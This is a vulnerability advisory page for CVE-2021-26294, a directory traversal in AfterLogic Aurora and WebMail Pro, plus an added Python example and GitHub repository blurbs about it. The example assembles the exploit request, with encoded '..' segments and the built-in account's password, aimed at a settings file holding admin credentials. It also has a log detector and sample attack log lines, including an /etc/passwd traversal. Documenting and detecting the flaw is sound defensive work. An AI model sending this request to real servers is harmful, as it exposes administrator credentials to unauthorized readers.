
CVE-2021-26294

Published: 07/03/2021 Updated: 11/03/2021
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
CVSS v3 Base Score: 7.5 | Impact Score: 3.6 | Exploitability Score: 3.9
VMScore: 446
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

Vulnerability Summary

An issue exists in AfterLogic Aurora up to and including 7.7.9 and WebMail Pro up to and including 7.7.9. They allow directory traversal to read files (such as a data/settings/settings.xml file containing admin panel credentials), as demonstrated by dav/server.php/files/personal/%2e%2e when using the caldav_public_user account (with caldav_public_user as its password).
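The request the summary describes, together with a detector for the same pattern in web-server access logs, as an added example that is not part of this page, of Vulmon, or of AfterLogic's code. It assumes a Combined Log Format access log, a hypothetical target host mail.example.com, and a traversal depth of two encoded ".." segments to reach data/settings/settings.xml; the depth depends on the install layout and is not stated above. The log lines are constructed, and build_probe only assembles the request, it sends nothing.

```python
"""Added example for CVE-2021-26294 (not from the page or from AfterLogic).

build_probe   - assembles the GET the advisory describes: the personal WebDAV
                path with %2e%2e traversal segments and the built-in
                caldav_public_user account as HTTP Basic credentials.
scan_access_log - flags requests to dav/server.php that contain a '..'
                segment after percent-decoding (single or double encoded).
All hostnames, paths and log lines are constructed for illustration.
"""
import base64
import re
from urllib.parse import unquote

# Built-in account and endpoint named in the advisory text.
PUBLIC_USER = "caldav_public_user"
PUBLIC_PASS = "caldav_public_user"
DAV_PREFIX = "/dav/server.php/files/personal/"


def build_probe(base_url, target_file, depth):
    """Return (url, headers) for a GET that walks `depth` directories up from
    the personal WebDAV root and asks for `target_file`.
    `depth` is an assumption: the number of segments needed to reach
    data/settings/settings.xml depends on the install layout."""
    traversal = "/".join(["%2e%2e"] * depth)  # encoded '..' segments, as in the advisory
    url = base_url.rstrip("/") + DAV_PREFIX + traversal + "/" + target_file.lstrip("/")
    token = base64.b64encode(f"{PUBLIC_USER}:{PUBLIC_PASS}".encode()).decode()
    return url, {"Authorization": "Basic " + token}


def fully_decode(path, rounds=3):
    """Undo up to `rounds` layers of percent-encoding so that both %2e%2e and
    the double-encoded %252e%252e become '..' before the traversal check."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def is_traversal_probe(path):
    """True if the request targets the WebDAV endpoint and, once decoded,
    contains a '..' path segment."""
    decoded = fully_decode(path)
    if "/dav/server.php/" not in decoded:
        return False
    return any(seg == ".." for seg in decoded.split("/"))


# Enough of the Combined Log Format to pull out the fields we need.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_access_log(lines):
    """Return one dict per log line that looks like a CVE-2021-26294 probe.
    `public_account` marks requests authenticated as the built-in user,
    which a normal deployment should never see reading personal files."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        if is_traversal_probe(m["path"]):
            hits.append({
                "ip": m["ip"],
                "user": m["user"],
                "status": int(m["status"]),
                "path": fully_decode(m["path"]),
                "public_account": m["user"] == PUBLIC_USER,
            })
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - caldav_public_user [07/Mar/2021:10:00:01 +0000] "GET /dav/server.php/files/personal/%2e%2e/%2e%2e/data/settings/settings.xml HTTP/1.1" 200 5120',
    '203.0.113.7 - - [07/Mar/2021:10:00:00 +0000] "GET /dav/server.php/files/personal/ HTTP/1.1" 401 0',
    '198.51.100.9 - alice [07/Mar/2021:10:01:13 +0000] "PROPFIND /dav/server.php/files/personal/notes.txt HTTP/1.1" 207 800',
    '198.51.100.9 - alice [07/Mar/2021:10:02:45 +0000] "GET /dav/server.php/files/personal/%252e%252e/%252e%252e/data/settings/settings.xml HTTP/1.1" 404 0',
    '192.0.2.4 - - [07/Mar/2021:10:03:00 +0000] "GET /index.php?page=..%2f..%2fetc%2fpasswd HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    url, headers = build_probe("https://mail.example.com", "data/settings/settings.xml", 2)
    print(url, headers)
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

A 200 on the decoded settings path for the built-in account is the confirmation signal; the double-encoded 404 from alice is still worth an alert, since the same request against an unpatched host behind a decoder that normalises once would succeed.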


Vulnerable Products

afterlogic aurora

afterlogic webmail pro

Github Repositories

AfterLogic Products Vulnerabilities

AfterLogic related CVEs discovered by E3SEC:
CVE-2021-26292 - Public Full Path Disclosure on AfterLogic Aurora & WebMail Pro WebDAV endpoint
CVE-2021-26293 - [9.8 CRITICAL] RCE via public unrestricted upload with path traversal on AfterLogic Aurora & WebMail Pro WebDAV endpoint
CVE-2021-26294 - [7.5 HIGH] Exposure of sensitive information to an unauthorized

Directory Traversal in AfterLogic WebMail Aurora and Pro

CVE-2021-26294 Exploit: Directory Traversal in AfterLogic WebMail Aurora and Pro. Description: AfterLogic Aurora and WebMail Pro 7.7.9 and all lower versions are affected by this vulnerability; simply sending an HTTP GET request to the WebDAV endpoint with the built-in “caldav_public_user@localhost” account and its predefined password “caldav_public_u